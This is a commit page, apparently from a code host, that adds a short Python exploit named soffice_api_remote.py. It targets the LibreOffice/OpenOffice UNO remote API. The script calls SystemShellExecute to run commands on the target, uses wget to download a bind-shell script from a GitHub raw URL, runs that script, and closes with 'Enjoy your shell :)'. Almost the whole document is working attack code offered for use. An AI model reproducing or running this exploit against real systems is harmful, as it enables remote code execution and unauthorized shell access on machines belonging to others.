adding the soffice_api_remote exploit
This commit is contained in:
dash
24
soffice_api_remote.py
Executable file
24
soffice_api_remote.py
Executable file
@@ -0,0 +1,24 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
# some months ago, this bug had been shown, but not the full exploit published as there
|
||||||
|
# had been discussions with the vendor
|
||||||
|
# in any case i had fun exploiting it
|
||||||
|
# today i put it online, as sud0woodo who found the bug had published his full exploit as well some time ago check it here: https://www.exploit-db.com/exploits/46544
|
||||||
|
|
||||||
|
import uno
|
||||||
|
import time
|
||||||
|
|
||||||
|
bindshell='https://raw.githubusercontent.com/infodox/python-pty-shells/master/tcp_pty_bind.py'
|
||||||
|
localContext = uno.getComponentContext()
|
||||||
|
|
||||||
|
resolver = localContext.ServiceManager.createInstanceWithContext("com.sun.star.system.SystemShellExecute", localContext )
|
||||||
|
|
||||||
|
resolver.execute('id','','')
|
||||||
|
time.sleep(1)
|
||||||
|
resolver.execute('wget',bindshell,'')
|
||||||
|
time.sleep(2)
|
||||||
|
resolver.execute('python2','tcp_pty_bind.py','')
|
||||||
|
|
||||||
|
time.sleep(5)
|
||||||
|
print ('Enjoy your shell :)')
|
||||||
Reference in New Issue
Block a user